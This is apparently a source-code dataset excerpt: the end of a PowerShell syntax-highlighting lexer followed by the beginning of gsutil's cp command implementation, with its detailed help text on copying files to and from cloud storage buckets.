'lt match ne not notcontains notlike notmatch or regex replace '
'wildcard').split()
verbs = (
'write where wait use update unregister undo trace test tee take '
'suspend stop start split sort skip show set send select scroll resume '
'restore restart resolve resize reset rename remove register receive '
'read push pop ping out new move measure limit join invoke import '
'group get format foreach export expand exit enter enable disconnect '
'disable debug cxnew copy convertto convertfrom convert connect '
'complete compare clear checkpoint aggregate add').split()
commenthelp = (
'component description example externalhelp forwardhelpcategory '
'forwardhelptargetname functionality inputs link '
'notes outputs parameter remotehelprunspace role synopsis').split()
tokens = {
'root': [
(r'\s+', Text),
(r'^(\s*#[#\s]*)(\.(?:%s))([^\n]*$)' % '|'.join(commenthelp),
bygroups(Comment, String.Doc, Comment)),
(r'#[^\n]*?$', Comment),
(r'(<|<)#', Comment.Multiline, 'multline'),
(r'@"\n.*?\n"@', String.Heredoc),
(r"@'\n.*?\n'@", String.Heredoc),
# escaped syntax
(r'`[\'"$@-]', Punctuation),
(r'"', String.Double, 'string'),
(r"'([^']|'')*'", String.Single),
(r'(\$|@@|@)((global|script|private|env):)?[a-z0-9_]+',
Name.Variable),
(r'(%s)\b' % '|'.join(keywords), Keyword),
(r'-(%s)\b' % '|'.join(operators), Operator),
(r'(%s)-[a-z_][a-z0-9_]*\b' % '|'.join(verbs), Name.Builtin),
(r'\[[a-z_\[][a-z0-9_. `,\[\]]*\]', Name.Constant), # .net [type]s
(r'-[a-z_][a-z0-9_]*', Name),
(r'\w+', Name),
(r'[.,{}\[\]$()=+*/\\&%!~?^`|<>-]', Punctuation),
],
'multline': [
(r'[^#&.]+', Comment.Multiline),
(r'#(>|>)', Comment.Multiline, '#pop'),
(r'\.(%s)' % '|'.join(commenthelp), String.Doc),
(r'[#&.]', Comment.Multiline),
],
'string': [
(r'[^$`"]+', String.Double),
(r'\$\(', String.Interpol, 'interpol'),
(r'`"|""', String.Double),
(r'[`$]', String.Double),
(r'"', String.Double, '#pop'),
],
'interpol': [
(r'[^$)]+', String.Interpol),
(r'\$\(', String.Interpol, '#push'),
(r'\)', String.Interpol, '#pop'),
]
}
| mit |
KaranToor/MA450 | google-cloud-sdk/platform/gsutil/gslib/commands/cp.py | 3 | 56552 | # -*- coding: utf-8 -*-
# Copyright 2011 Google Inc. All Rights Reserved.
# Copyright 2011, Nexenta Systems Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implementation of Unix-like cp command for cloud storage providers."""
from __future__ import absolute_import
import logging
import os
import time
import traceback
from apitools.base.py import encoding
from gslib import copy_helper
from gslib.cat_helper import CatHelper
from gslib.command import Command
from gslib.command_argument import CommandArgument
from gslib.commands.compose import MAX_COMPONENT_COUNT
from gslib.copy_helper import CreateCopyHelperOpts
from gslib.copy_helper import GetSourceFieldsNeededForCopy
from gslib.copy_helper import GZIP_ALL_FILES
from gslib.copy_helper import ItemExistsError
from gslib.copy_helper import Manifest
from gslib.copy_helper import PARALLEL_UPLOAD_TEMP_NAMESPACE
from gslib.copy_helper import SkipUnsupportedObjectError
from gslib.cs_api_map import ApiSelector
from gslib.exception import CommandException
from gslib.metrics import LogPerformanceSummaryParams
from gslib.name_expansion import NameExpansionIterator
from gslib.name_expansion import SeekAheadNameExpansionIterator
from gslib.name_expansion import SourceUrlTypeIterator
from gslib.posix_util import ConvertModeToBase8
from gslib.posix_util import DeserializeFileAttributesFromObjectMetadata
from gslib.posix_util import InitializeUserGroups
from gslib.posix_util import POSIXAttributes
from gslib.posix_util import SerializeFileAttributesToObjectMetadata
from gslib.posix_util import ValidateFilePermissionAccess
from gslib.storage_url import ContainsWildcard
from gslib.third_party.storage_apitools import storage_v1_messages as apitools_messages
from gslib.util import CalculateThroughput
from gslib.util import CreateLock
from gslib.util import DEBUGLEVEL_DUMP_REQUESTS
from gslib.util import GetCloudApiInstance
from gslib.util import IsCloudSubdirPlaceholder
from gslib.util import MakeHumanReadable
from gslib.util import NO_MAX
from gslib.util import NormalizeStorageClass
from gslib.util import RemoveCRLFFromString
from gslib.util import StdinIterator
_SYNOPSIS = """
gsutil cp [OPTION]... src_url dst_url
gsutil cp [OPTION]... src_url... dst_url
gsutil cp [OPTION]... -I dst_url
"""
_SYNOPSIS_TEXT = """
<B>SYNOPSIS</B>
""" + _SYNOPSIS
_DESCRIPTION_TEXT = """
<B>DESCRIPTION</B>
The gsutil cp command allows you to copy data between your local file
system and the cloud, copy data within the cloud, and copy data between
cloud storage providers. For example, to copy all text files from the
local directory to a bucket you could do:
gsutil cp *.txt gs://my-bucket
Similarly, you can download text files from a bucket by doing:
gsutil cp gs://my-bucket/*.txt .
If you want to copy an entire directory tree you need to use the -r option:
gsutil cp -r dir gs://my-bucket
If you have a large number of files to transfer you might want to use the
gsutil -m option, to perform a parallel (multi-threaded/multi-processing)
copy:
gsutil -m cp -r dir gs://my-bucket
You can pass a list of URLs (one per line) to copy on stdin instead of as
command line arguments by using the -I option. This allows you to use gsutil
in a pipeline to upload or download files / objects as generated by a program,
such as:
some_program | gsutil -m cp -I gs://my-bucket
or:
some_program | gsutil -m cp -I ./download_dir
The contents of stdin can name files, cloud URLs, and wildcards of files
and cloud URLs.
"""
_NAME_CONSTRUCTION_TEXT = """
<B>HOW NAMES ARE CONSTRUCTED</B>
The gsutil cp command strives to name objects in a way consistent with how
Linux cp works, which causes names to be constructed in varying ways depending
on whether you're performing a recursive directory copy or copying
individually named objects; and whether you're copying to an existing or
non-existent directory.
When performing recursive directory copies, object names are constructed that
mirror the source directory structure starting at the point of recursive
processing. For example, if dir1/dir2 contains the file a/b/c then the
command:
gsutil cp -r dir1/dir2 gs://my-bucket
will create the object gs://my-bucket/dir2/a/b/c.
In contrast, copying individually named files will result in objects named by
the final path component of the source files. For example, again assuming
dir1/dir2 contains a/b/c, the command:
gsutil cp dir1/dir2/** gs://my-bucket
will create the object gs://my-bucket/c.
The same rules apply for downloads: recursive copies of buckets and
bucket subdirectories produce a mirrored filename structure, while copying
individually (or wildcard) named objects produce flatly named files.
Note that in the above example the '**' wildcard matches all names
anywhere under dir. The wildcard '*' will match names just one level deep. For
more details see "gsutil help wildcards".
There's an additional wrinkle when working with subdirectories: the resulting
names depend on whether the destination subdirectory exists. For example,
if gs://my-bucket/subdir exists as a subdirectory, the command:
gsutil cp -r dir1/dir2 gs://my-bucket/subdir
will create the object gs://my-bucket/subdir/dir2/a/b/c. In contrast, if
gs://my-bucket/subdir does not exist, this same gsutil cp command will create
the object gs://my-bucket/subdir/a/b/c.
Note: If you use the
`Google Cloud Platform Console <https://console.cloud.google.com>`_
to create folders, it does so by creating a "placeholder" object that ends
with a "/" character. gsutil skips these objects when downloading from the
cloud to the local file system, because attempting to create a file that
ends with a "/" is not allowed on Linux and MacOS. Because of this, it is
recommended that you not create objects that end with "/" (unless you don't
need to be able to download such objects using gsutil).
"""
_SUBDIRECTORIES_TEXT = """
<B>COPYING TO/FROM SUBDIRECTORIES; DISTRIBUTING TRANSFERS ACROSS MACHINES</B>
You can use gsutil to copy to and from subdirectories by using a command
like:
gsutil cp -r dir gs://my-bucket/data
This will cause dir and all of its files and nested subdirectories to be
copied under the specified destination, resulting in objects with names like
gs://my-bucket/data/dir/a/b/c. Similarly you can download from bucket
subdirectories by using a command like:
gsutil cp -r gs://my-bucket/data dir
This will cause everything nested under gs://my-bucket/data to be downloaded
into dir, resulting in files with names like dir/data/a/b/c.
Copying subdirectories is useful if you want to add data to an existing
bucket directory structure over time. It's also useful if you want
to parallelize uploads and downloads across multiple machines (potentially
reducing overall transfer time compared with simply running gsutil -m
cp on one machine). For example, if your bucket contains this structure:
gs://my-bucket/data/result_set_01/
gs://my-bucket/data/result_set_02/
...
gs://my-bucket/data/result_set_99/
you could perform concurrent downloads across 3 machines by running these
commands on each machine, respectively:
gsutil -m cp -r gs://my-bucket/data/result_set_[0-3]* dir
gsutil -m cp -r gs://my-bucket/data/result_set_[4-6]* dir
gsutil -m cp -r gs://my-bucket/data/result_set_[7-9]* dir
Note that dir could be a local directory on each machine, or it could be a
directory mounted off of a shared file server; whether the latter performs
acceptably will depend on a number of factors, so we recommend experimenting
to find out what works best for your computing environment.
"""
_COPY_IN_CLOUD_TEXT = """
<B>COPYING IN THE CLOUD AND METADATA PRESERVATION</B>
If both the source and destination URL are cloud URLs from the same
provider, gsutil copies data "in the cloud" (i.e., without downloading
to and uploading from the machine where you run gsutil). In addition to
the performance and cost advantages of doing this, copying in the cloud
preserves metadata (like Content-Type and Cache-Control). In contrast,
when you download data from the cloud it ends up in a file, which has
no associated metadata. Thus, unless you have some way to hold on to
or re-create that metadata, downloading to a file will not retain the
metadata.
Copies spanning locations and/or storage classes cause data to be rewritten
in the cloud, which may take some time (but still will be faster than
downloading and re-uploading). Such operations can be resumed with the same
command if they are interrupted, so long as the command parameters are
identical.
Note that by default, the gsutil cp command does not copy the object
ACL to the new object, and instead will use the default bucket ACL (see
"gsutil help defacl"). You can override this behavior with the -p
option (see OPTIONS below).
One additional note about copying in the cloud: If the destination bucket has
versioning enabled, by default gsutil cp will copy only live versions of the
source object(s). For example:
gsutil cp gs://bucket1/obj gs://bucket2
will cause only the single live version of gs://bucket1/obj to be copied to
gs://bucket2, even if there are archived versions of gs://bucket1/obj. To also
copy archived versions, use the -A flag:
gsutil cp -A gs://bucket1/obj gs://bucket2
The gsutil -m flag is disallowed when using the cp -A flag, to ensure that
version ordering is preserved.
"""
_CHECKSUM_VALIDATION_TEXT = """
<B>CHECKSUM VALIDATION</B>
At the end of every upload or download the gsutil cp command validates that
the checksum it computes for the source file/object matches the checksum
the service computes. If the checksums do not match, gsutil will delete the
corrupted object and print a warning message. This very rarely happens, but
if it does, please contact gs-team@google.com.
If you know the MD5 of a file before uploading you can specify it in the
Content-MD5 header, which will cause the cloud storage service to reject the
upload if the MD5 doesn't match the value computed by the service. For
example:
% gsutil hash obj
Hashing obj:
Hashes [base64] for obj:
Hash (crc32c): lIMoIw==
Hash (md5): VgyllJgiiaRAbyUUIqDMmw==
% gsutil -h Content-MD5:VgyllJgiiaRAbyUUIqDMmw== cp obj gs://your-bucket/obj
Copying file://obj [Content-Type=text/plain]...
Uploading gs://your-bucket/obj: 182 b/182 B
If the checksum didn't match the service would instead reject the upload and
gsutil would print a message like:
BadRequestException: 400 Provided MD5 hash "VgyllJgiiaRAbyUUIqDMmw=="
doesn't match calculated MD5 hash "7gyllJgiiaRAbyUUIqDMmw==".
Even if you don't do this gsutil will delete the object if the computed
checksum mismatches, but specifying the Content-MD5 header has several
advantages:
1. It prevents the corrupted object from becoming visible at all, whereas
otherwise it would be visible for 1-3 seconds before gsutil deletes it.
2. If an object already exists with the given name, specifying the
Content-MD5 header will cause the existing object never to be replaced,
whereas otherwise it would be replaced by the corrupted object and then
deleted a few seconds later.
3. It will definitively prevent the corrupted object from being left in
the cloud, whereas the gsutil approach of deleting after the upload
completes could fail if (for example) the gsutil process gets ^C'd
between upload and deletion request.
4. It supports a customer-to-service integrity check handoff. For example,
if you have a content production pipeline that generates data to be
uploaded to the cloud along with checksums of that data, specifying the
MD5 computed by your content pipeline when you run gsutil cp will ensure
that the checksums match all the way through the process (e.g., detecting
if data gets corrupted on your local disk between the time it was written
by your content pipeline and the time it was uploaded to GCS).
Note: The Content-MD5 header is ignored for composite objects, because such
objects only have a CRC32C checksum.
"""
_RETRY_HANDLING_TEXT = """
<B>RETRY HANDLING</B>
The cp command will retry when failures occur, but if enough failures happen
during a particular copy or delete operation the cp command will skip that
object and move on. At the end of the copy run if any failures were not
successfully retried, the cp command will report the count of failures, and
exit with non-zero status.
Note that there are cases where retrying will never succeed, such as if you
don't have write permission to the destination bucket or if the destination
path for some objects is longer than the maximum allowed length.
For more details about gsutil's retry handling, please see
"gsutil help retries".
"""
_RESUMABLE_TRANSFERS_TEXT = """
<B>RESUMABLE TRANSFERS</B>
gsutil automatically performs a resumable upload whenever you use the cp
command to upload an object that is larger than 8 MiB. You do not need to
specify any special command line options to make this happen. If your upload
is interrupted you can restart the upload by running the same cp command that
you ran to start the upload. Until the upload has completed successfully, it
will not be visible at the destination object and will not replace any
existing object the upload is intended to overwrite. However, see the section
on PARALLEL COMPOSITE UPLOADS, which may leave temporary component objects in
place during the upload process.
Similarly, gsutil automatically performs resumable downloads (using standard
HTTP Range GET operations) whenever you use the cp command, unless the
destination is a stream. In this case, a partially downloaded temporary file
will be visible in the destination directory. Upon completion, the original
file is deleted and overwritten with the downloaded contents.
Resumable uploads and downloads store state information in files under
~/.gsutil, named by the destination object or file. If you attempt to resume a
transfer from a machine with a different directory, the transfer will start
over from scratch.
See also "gsutil help prod" for details on using resumable transfers
in production.
"""
_STREAMING_TRANSFERS_TEXT = """
<B>STREAMING TRANSFERS</B>
Use '-' in place of src_url or dst_url to perform a streaming
transfer. For example:
long_running_computation | gsutil cp - gs://my-bucket/obj
Streaming uploads using the JSON API (see "gsutil help apis") are buffered in
memory part-way back into the file and can thus retry in the event of network
or service problems.
Streaming transfers using the XML API do not support resumable
uploads/downloads. If you have a large amount of data to upload (say, more
than 100 MiB) it is recommended that you write the data to a local file and
then copy that file to the cloud rather than streaming it (and similarly for
large downloads).
WARNING: When performing streaming transfers gsutil does not compute a
checksum of the uploaded or downloaded data. Therefore, we recommend that
users either perform their own validation of the data or use non-streaming
transfers (which perform integrity checking automatically).
"""
_SLICED_OBJECT_DOWNLOADS_TEXT = """
<B>SLICED OBJECT DOWNLOADS</B>
gsutil uses HTTP Range GET requests to perform "sliced" downloads in parallel
when downloading large objects from Google Cloud Storage. This means that disk
space for the temporary download destination file will be pre-allocated and
byte ranges (slices) within the file will be downloaded in parallel. Once all
slices have completed downloading, the temporary file will be renamed to the
destination file. No additional local disk space is required for this
operation.
This feature is only available for Google Cloud Storage objects because it
requires a fast composable checksum (CRC32C) that can be used to verify the
data integrity of the slices. And because it depends on CRC32C, using sliced
object downloads also requires a compiled crcmod (see "gsutil help crcmod") on
the machine performing the download. If compiled crcmod is not available,
a non-sliced object download will instead be performed.
Note: since sliced object downloads cause multiple writes to occur at various
locations on disk, this mechanism can degrade performance for disks with slow
seek times, especially for large numbers of slices. While the default number
of slices is set small to avoid this problem, you can disable sliced object
download if necessary by setting the "sliced_object_download_threshold"
variable in the .boto config file to 0.
"""
_PARALLEL_COMPOSITE_UPLOADS_TEXT = """
<B>PARALLEL COMPOSITE UPLOADS</B>
gsutil can automatically use
`object composition <https://cloud.google.com/storage/docs/composite-objects>`_
to perform uploads in parallel for large, local files being uploaded to Google
Cloud Storage. If enabled (see next paragraph), a large file will be split
into component pieces that are uploaded in parallel and then composed in the
cloud (and the temporary components finally deleted). No additional local disk
space is required for this operation.
Using parallel composite uploads presents a tradeoff between upload
performance and download configuration: If you enable parallel composite
uploads your uploads will run faster, but someone will need to install a
compiled crcmod (see "gsutil help crcmod") on every machine where objects are
downloaded by gsutil or other Python applications. Note that for such uploads,
crcmod is required for downloading regardless of whether the parallel
composite upload option is on or not. For some distributions this is easy
(e.g., it comes pre-installed on MacOS), but in other cases some users have
found it difficult. Because of this, at present parallel composite uploads are
disabled by default. Google is actively working with a number of the Linux
distributions to get crcmod included with the stock distribution. Once that is
done we will re-enable parallel composite uploads by default in gsutil.
Parallel composite uploads should not be used with NEARLINE storage
class buckets, because doing this would incur an early deletion charge for
each component object.
To try parallel composite uploads you can run the command:
gsutil -o GSUtil:parallel_composite_upload_threshold=150M cp bigfile gs://your-bucket
where bigfile is larger than 150 MiB. When you do this notice that the upload
progress indicator continuously updates for several different uploads at once
(corresponding to each of the sections of the file being uploaded in
parallel), until the parallel upload completes. If after trying this you want
to enable parallel composite uploads for all of your future uploads
(notwithstanding the caveats mentioned earlier), you can uncomment and set the
"parallel_composite_upload_threshold" config value in your .boto configuration
file to this value.
Note that the crcmod problem only impacts downloads via Python applications
(such as gsutil). If all users who need to download the data using gsutil or
other Python applications can install crcmod, or if no Python users will
need to download your objects, it makes sense to enable parallel composite
uploads (see above). For example, if you use gsutil to upload video assets,
and those assets will only ever be served via a Java application, it would
make sense to enable parallel composite uploads on your machine (there are
efficient CRC32C implementations available in Java).
If a parallel composite upload fails prior to composition, re-running the
gsutil command will take advantage of resumable uploads for the components
that failed, and the component objects will be deleted after the first
successful attempt. Any temporary objects that were uploaded successfully
before gsutil failed will still exist until the upload is completed
successfully. The temporary objects will be named in the following fashion:
<random ID>%s<hash>
where <random ID> is a numerical value, and <hash> is an MD5 hash (not related
to the hash of the contents of the file or object).
To avoid leaving temporary objects around, you should make sure to check the
exit status from the gsutil command. This can be done in a bash script, for
example, by doing:
if ! gsutil cp ./local-file gs://your-bucket/your-object; then
<< Code that handles failures >>
fi
Or, for copying a directory, use this instead:
if ! gsutil cp -c -L cp.log -r ./dir gs://bucket; then
<< Code that handles failures >>
fi
One important caveat is that files uploaded using parallel composite uploads
are subject to a maximum number of components limit. For example, if you
upload a large file that gets split into %d components, and try to compose it
with another object with %d components, the operation will fail because it
exceeds the %d component limit. If you wish to compose an object later and the
component limit is a concern, it is recommended that you disable parallel
composite uploads for that transfer.
Also note that an object uploaded using parallel composite uploads will have a
CRC32C hash, but it will not have an MD5 hash (and because of that, users who
download the object must have crcmod installed, as noted earlier). For details
see "gsutil help crc32c".
Parallel composite uploads can be disabled by setting the
"parallel_composite_upload_threshold" variable in the .boto config file to 0.
""" % (PARALLEL_UPLOAD_TEMP_NAMESPACE, 10, MAX_COMPONENT_COUNT - 9,
MAX_COMPONENT_COUNT)
_CHANGING_TEMP_DIRECTORIES_TEXT = """
<B>CHANGING TEMP DIRECTORIES</B>
gsutil writes data to a temporary directory in several cases:
- when compressing data to be uploaded (see the -z and -Z options)
- when decompressing data being downloaded (when the data has
Content-Encoding:gzip, e.g., as happens when uploaded using gsutil cp -z
or gsutil cp -Z)
- when running integration tests (using the gsutil test command)
In these cases it's possible the temp file location on your system that
gsutil selects by default may not have enough space. If gsutil runs out of
space during one of these operations (e.g., raising
"CommandException: Inadequate temp space available to compress <your file>"
during a gsutil cp -z operation), you can change where it writes these
temp files by setting the TMPDIR environment variable. On Linux and MacOS
you can do this either by running gsutil this way:
TMPDIR=/some/directory gsutil cp ...
or by adding this line to your ~/.bashrc file and then restarting the shell
before running gsutil:
export TMPDIR=/some/directory
On Windows 7 you can change the TMPDIR environment variable from Start ->
Computer -> System -> Advanced System Settings -> Environment Variables.
You need to reboot after making this change for it to take effect. (Rebooting
is not necessary after running the export command on Linux and MacOS.)
"""
_COPYING_SPECIAL_FILES_TEXT = """
<B>COPYING SPECIAL FILES</B>
gsutil cp does not support copying special file types such as sockets, device
files, named pipes, or any other non-standard files intended to represent an
operating system resource. You should not run gsutil cp with sources that
include such files (for example, recursively copying the root directory on
Linux that includes /dev ). If you do, gsutil cp may fail or hang.
"""
_OPTIONS_TEXT = """
<B>OPTIONS</B>
-a canned_acl Sets named canned_acl when uploaded objects created. See
"gsutil help acls" for further details.
-A Copy all source versions from a source buckets/folders.
If not set, only the live version of each source object is
copied. Note: this option is only useful when the destination
bucket has versioning enabled.
-c If an error occurs, continue to attempt to copy the remaining
files. If any copies were unsuccessful, gsutil's exit status
will be non-zero even if this flag is set. This option is
implicitly set when running "gsutil -m cp...". Note: -c only
applies to the actual copying operation. If an error occurs
while iterating over the files in the local directory (e.g.,
invalid Unicode file name) gsutil will print an error message
and abort.
-D Copy in "daisy chain" mode, i.e., copying between two buckets
by hooking a download to an upload, via the machine where
gsutil is run. This stands in contrast to the default, where
data are copied between two buckets "in the cloud", i.e.,
without needing to copy via the machine where gsutil runs.
By default, a "copy in the cloud" when the source is a
composite object will retain the composite nature of the
object. However, Daisy chain mode can be used to change a
composite object into a non-composite object. For example:
gsutil cp -D -p gs://bucket/obj gs://bucket/obj_tmp
gsutil mv -p gs://bucket/obj_tmp gs://bucket/obj
Note: Daisy chain mode is automatically used when copying
between providers (e.g., to copy data from Google Cloud Storage
to another provider).
-e Exclude symlinks. When specified, symbolic links will not be
copied.
-I Causes gsutil to read the list of files or objects to copy from
stdin. This allows you to run a program that generates the list
of files to upload/download.
-L <file> Outputs a manifest log file with detailed information about
each item that was copied. This manifest contains the following
information for each item:
- Source path.
- Destination path.
- Source size.
- Bytes transferred.
- MD5 hash.
- UTC date and time transfer was started in ISO 8601 format.
- UTC date and time transfer was completed in ISO 8601 format.
- Upload id, if a resumable upload was performed.
- Final result of the attempted transfer, success or failure.
- Failure details, if any.
If the log file already exists, gsutil will use the file as an
input to the copy process, and will also append log items to
the existing file. Files/objects that are marked in the
existing log file as having been successfully copied (or
skipped) will be ignored. Files/objects without entries will be
copied and ones previously marked as unsuccessful will be
retried. This can be used in conjunction with the -c option to
build a script that copies a large number of objects reliably,
using a bash script like the following:
until gsutil cp -c -L cp.log -r ./dir gs://bucket; do
sleep 1
done
The -c option will cause copying to continue after failures
occur, and the -L option will allow gsutil to pick up where it
left off without duplicating work. The loop will continue
running as long as gsutil exits with a non-zero status (such a
status indicates there was at least one failure during the
gsutil run).
Note: If you're trying to synchronize the contents of a
directory and a bucket (or two buckets), see
"gsutil help rsync".
-n No-clobber. When specified, existing files or objects at the
destination will not be overwritten. Any items that are skipped
by this option will be reported as being skipped. This option
will perform an additional GET request to check if an item
exists before attempting to upload the data. This will save
retransmitting data, but the additional HTTP requests may make
small object transfers slower and more expensive.
-p Causes ACLs to be preserved when copying in the cloud. Note
that this option has performance and cost implications when
using the XML API, as it requires separate HTTP calls for
interacting with ACLs. (There are no such performance or cost
implications when using the -p option with the JSON API.) The
performance issue can be mitigated to some degree by using
gsutil -m cp to cause parallel copying. Note that this option
only works if you have OWNER access to all of the objects that
are copied.
You can avoid the additional performance and cost of using
cp -p if you want all objects in the destination bucket to end
up with the same ACL by setting a default object ACL on that
bucket instead of using cp -p. See "gsutil help defacl".
Note that it's not valid to specify both the -a and -p options
together.
-P Causes POSIX attributes to be preserved when objects are
copied. With this feature enabled, gsutil cp will copy fields
provided by stat. These are the user ID of the owner, the group
ID of the owning group, the mode (permissions) of the file, and
the access/modification time of the file. For downloads, these
attributes will only be set if the source objects were uploaded
with this flag enabled.
On Windows, this flag will only set and restore access time and
modification time. This is because Windows doesn't have a
notion of POSIX uid/gid/mode.
-R, -r The -R and -r options are synonymous. Causes directories,
buckets, and bucket subdirectories to be copied recursively.
If you neglect to use this option for an upload, gsutil will
copy any files it finds and skip any directories. Similarly,
neglecting to specify this option for a download will cause
gsutil to copy any objects at the current bucket directory
level, and skip any subdirectories.
-s <class> The storage class of the destination object(s), otherwise the
default storage class from the destination bucket will be used.
Not valid for copying to non-cloud destinations.
-U Skip objects with unsupported object types instead of failing.
Unsupported object types are Amazon S3 Objects in the GLACIER
storage class.
-v Requests that the version-specific URL for each uploaded object
be printed. Given this URL you can make future upload requests
that are safe in the face of concurrent updates, because Google
Cloud Storage will refuse to perform the update if the current
object version doesn't match the version-specific URL. See
"gsutil help versions" for more details.
-z <ext,...> Applies gzip content-encoding to file uploads with the given
extensions. This is useful when uploading files with
compressible content (such as .js, .css, or .html files)
because it saves network bandwidth and space in Google Cloud
Storage, which in turn reduces storage costs.
When you specify the -z option, the data from your files is
compressed before it is uploaded, but your actual files are
left uncompressed on the local disk. The uploaded objects
retain the Content-Type and name of the original files but are
given a Content-Encoding header with the value "gzip" to
indicate that the object data stored are compressed on the
Google Cloud Storage servers.
For example, the following command:
gsutil cp -z html -a public-read cattypes.html gs://mycats
will do all of the following:
- Upload as the object gs://mycats/cattypes.html (cp command)
- Set the Content-Type to text/html (based on file extension)
- Compress the data in the file cattypes.html (-z option)
- Set the Content-Encoding to gzip (-z option)
- Set the ACL to public-read (-a option)
- If a user tries to view cattypes.html in a browser, the
browser will know to uncompress the data based on the
Content-Encoding header, and to render it as HTML based on
the Content-Type header.
Note that if you download an object with Content-Encoding:gzip
gsutil will decompress the content before writing the local
file.
-Z Applies gzip content-encoding to file uploads. This option
works like the -z option described above, but it applies to
all uploaded files, regardless of extension.
Warning: If you use this option and some of the source files
don't compress well (e.g., that's often true of binary data),
this option may result in files taking up more space in the
cloud than they would if left uncompressed.
"""
_DETAILED_HELP_TEXT = '\n\n'.join([_SYNOPSIS_TEXT,
_DESCRIPTION_TEXT,
_NAME_CONSTRUCTION_TEXT,
_SUBDIRECTORIES_TEXT,
_COPY_IN_CLOUD_TEXT,
_CHECKSUM_VALIDATION_TEXT,
_RETRY_HANDLING_TEXT,
_RESUMABLE_TRANSFERS_TEXT,
_STREAMING_TRANSFERS_TEXT,
_SLICED_OBJECT_DOWNLOADS_TEXT,
_PARALLEL_COMPOSITE_UPLOADS_TEXT,
_CHANGING_TEMP_DIRECTORIES_TEXT,
_COPYING_SPECIAL_FILES_TEXT,
_OPTIONS_TEXT])
CP_SUB_ARGS = 'a:AcDeIL:MNnpPrRs:tUvz:Z'
def _CopyFuncWrapper(cls, args, thread_state=None):
cls.CopyFunc(args, thread_state=thread_state,
preserve_posix=cls.preserve_posix_attrs)
def _CopyExceptionHandler(cls, e):
"""Simple exception handler to allow post-completion status."""
cls.logger.error(str(e))
cls.op_failure_count += 1
cls.logger.debug('\n\nEncountered exception while copying:\n%s\n',
traceback.format_exc())
def _RmExceptionHandler(cls, e):
"""Simple exception handler to allow post-completion status."""
cls.logger.error(str(e))
class CpCommand(Command):
"""Implementation of gsutil cp command.
Note that CpCommand is run for both gsutil cp and gsutil mv. The latter
happens by MvCommand calling CpCommand and passing the hidden (undocumented)
-M option. This allows the copy and remove needed for each mv to run
together (rather than first running all the cp's and then all the rm's, as
we originally had implemented), which in turn avoids the following problem
with removing the wrong objects: starting with a bucket containing only
the object gs://bucket/obj, say the user does:
gsutil mv gs://bucket/* gs://bucket/d.txt
If we ran all the cp's and then all the rm's and we didn't expand the wildcard
first, the cp command would first copy gs://bucket/obj to gs://bucket/d.txt,
and the rm command would then remove that object. In the implementation
prior to gsutil release 3.12 we avoided this by building a list of objects
to process and then running the copies and then the removes; but building
the list up front limits scalability (compared with the current approach
of processing the bucket listing iterator on the fly).
"""
# Command specification. See base class for documentation.
command_spec = Command.CreateCommandSpec(
'cp',
command_name_aliases=['copy'],
usage_synopsis=_SYNOPSIS,
min_args=1,
max_args=NO_MAX,
# -t is deprecated but leave intact for now to avoid breakage.
supported_sub_args=CP_SUB_ARGS,
file_url_ok=True,
provider_url_ok=False,
urls_start_arg=0,
gs_api_support=[ApiSelector.XML, ApiSelector.JSON],
gs_default_api=ApiSelector.JSON,
supported_private_args=['testcallbackfile='],
argparse_arguments=[
CommandArgument.MakeZeroOrMoreCloudOrFileURLsArgument()
]
)
# Help specification. See help_provider.py for documentation.
help_spec = Command.HelpSpec(
help_name='cp',
help_name_aliases=['copy'],
help_type='command_help',
help_one_line_summary='Copy files and objects',
help_text=_DETAILED_HELP_TEXT,
subcommand_help_text={},
)
# pylint: disable=too-many-statements
def CopyFunc(self, name_expansion_result, thread_state=None,
preserve_posix=False):
"""Worker function for performing the actual copy (and rm, for mv)."""
gsutil_api = GetCloudApiInstance(self, thread_state=thread_state)
copy_helper_opts = copy_helper.GetCopyHelperOpts()
if copy_helper_opts.perform_mv:
cmd_name = 'mv'
else:
cmd_name = self.command_name
src_url = name_expansion_result.source_storage_url
exp_src_url = name_expansion_result.expanded_storage_url
src_url_names_container = name_expansion_result.names_container
have_multiple_srcs = name_expansion_result.is_multi_source_request
if src_url.IsCloudUrl() and src_url.IsProvider():
raise CommandException(
'The %s command does not allow provider-only source URLs (%s)' %
(cmd_name, src_url))
if preserve_posix and src_url.IsFileUrl() and src_url.IsStream():
raise CommandException('Cannot preserve POSIX attributes with a stream.')
if have_multiple_srcs:
copy_helper.InsistDstUrlNamesContainer(
self.exp_dst_url, self.have_existing_dst_container, cmd_name)
# Various GUI tools (like the GCS web console) create placeholder objects
# ending with '/' when the user creates an empty directory. Normally these
# tools should delete those placeholders once objects have been written
# "under" the directory, but sometimes the placeholders are left around. We
# need to filter them out here, otherwise if the user tries to rsync from
# GCS to a local directory it will result in a directory/file conflict
# (e.g., trying to download an object called "mydata/" where the local
# directory "mydata" exists).
if IsCloudSubdirPlaceholder(exp_src_url):
# We used to output the message 'Skipping cloud sub-directory placeholder
# object...' but we no longer do so because it caused customer confusion.
return
if copy_helper_opts.use_manifest and self.manifest.WasSuccessful(
exp_src_url.url_string):
return
if copy_helper_opts.perform_mv:
if name_expansion_result.names_container:
# Use recursion_requested when performing name expansion for the
# directory mv case so we can determine if any of the source URLs are
# directories (and then use cp -r and rm -r to perform the move, to
# match the behavior of Linux mv (which when moving a directory moves
# all the contained files).
self.recursion_requested = True
# Disallow wildcard src URLs when moving directories, as supporting it
# would make the name transformation too complex and would also be
# dangerous (e.g., someone could accidentally move many objects to the
# wrong name, or accidentally overwrite many objects).
if ContainsWildcard(src_url.url_string):
raise CommandException('The mv command disallows naming source '
'directories using wildcards')
if (self.exp_dst_url.IsFileUrl()
and not os.path.exists(self.exp_dst_url.object_name)
and have_multiple_srcs):
os.makedirs(self.exp_dst_url.object_name)
dst_url = copy_helper.ConstructDstUrl(
src_url, exp_src_url, src_url_names_container, have_multiple_srcs,
self.exp_dst_url, self.have_existing_dst_container,
self.recursion_requested, preserve_posix=preserve_posix)
dst_url = copy_helper.FixWindowsNaming(src_url, dst_url)
copy_helper.CheckForDirFileConflict(exp_src_url, dst_url)
if copy_helper.SrcDstSame(exp_src_url, dst_url):
raise CommandException('%s: "%s" and "%s" are the same file - '
'abort.' % (cmd_name, exp_src_url, dst_url))
